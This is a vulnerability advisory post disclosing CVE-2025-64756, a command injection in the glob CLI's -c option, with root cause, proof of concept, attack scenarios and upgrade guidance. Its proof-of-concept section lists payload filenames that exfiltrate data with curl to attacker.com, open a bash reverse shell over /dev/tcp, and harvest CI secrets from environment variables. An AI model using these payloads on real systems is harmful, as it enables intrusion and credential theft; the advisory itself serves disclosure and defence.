← Back to Blog
HighCVSS 7.5Command InjectionCVE-2025-64756

Published 2025

glob CLI Command Injection via Filename Shell Metacharacters

BugBunny.ai discovered a high severity command injection vulnerability in the glob CLI where filenames containing shell metacharacters are passed unsanitized to a shell command when using the -c/--cmd option. This enables arbitrary code execution in CI/CD pipelines, developer machines, and automated processing systems.

Responsibly DisclosedView CVE →

TL;DR

Filenames with shell metacharacters execute as commands

Impact:Arbitrary command execution via crafted filenames
Vector:glob -c <cmd> "**/*" with malicious filenames
Surface:CI/CD, build scripts, file processing pipelines
Status:Fixed in glob v10.5.0, v11.1.0, v12.0.0

Root Cause

The glob CLI's -c/--cmd option passes matched filenames to a child process using shell: true. When filenames contain shell metacharacters like $(...), backticks, or semicolons, the shell interprets them as commands rather than literal strings.

Proof of Concept

# Vulnerable code in glob CLI (src/bin.mts:277)
# Matched filenames passed to shell with shell: true
stream.on('end', () => foregroundChild(cmd, matches, { shell: true }))

# ========== PROOF OF CONCEPT ==========

# 1. Create a file with command injection payload in filename
mkdir test_directory && cd test_directory
touch '$(touch injected_poc)'

# 2. Run glob CLI with -c option
glob -c echo "**/*"

# Result:
# - The echo command executes normally
# - The $(touch injected_poc) in filename is evaluated by shell
# - A new file "injected_poc" is created, proving arbitrary code execution

# ========== ADVANCED PAYLOADS ==========

# Data Exfiltration:
touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)'

# Reverse Shell:
touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'

# Environment Variable Harvesting (CI/CD secrets):
touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)'

# Attack Scenarios:
# - CI/CD: Malicious PR adds crafted filenames, pipeline runs glob -c
# - Developer: Clone repo with malicious filenames, local build scripts execute
# - Supply Chain: Malicious npm packages include crafted filenames

Attack Scenarios

CI/CD PipelinesMalicious PR adds crafted filenames. Pipeline runs glob -c during build, executing injected commands with CI credentials.
Supply ChainMalicious packages include files with crafted names. Build processes using glob CLI automatically execute injected commands.
Automated Processing SystemsServices processing uploaded files or external content with glob CLI. File uploads with malicious names trigger server compromise.

Mitigation

  • Upgrade to glob v10.5.0, v11.1.0, or v12.0.0 immediately
  • If commands fail after upgrade, use --cmd-arg/-g instead of positional arguments
  • Avoid using glob -c on directories containing untrusted content
  • Audit CI/CD pipelines for glob CLI usage on PR-submitted files

Scope Limitation

The core glob library functions (glob(), globSync(), async iterators) are safe. Only the CLI with -c/--cmd option is vulnerable.

Credits & Disclosure

Vulnerability identified by BugBunny.ai and reported through coordinated disclosure. The glob maintainer (@isaacs) promptly addressed the issue with patches in v10.5.0, v11.1.0, and v12.0.0.

Reporter: BugBunny.aiAdvisory: GHSA-5j98-mcp5-4vw2
CVE-2025-64756: glob CLI Command Injection | BugBunny.ai | BugBunny.ai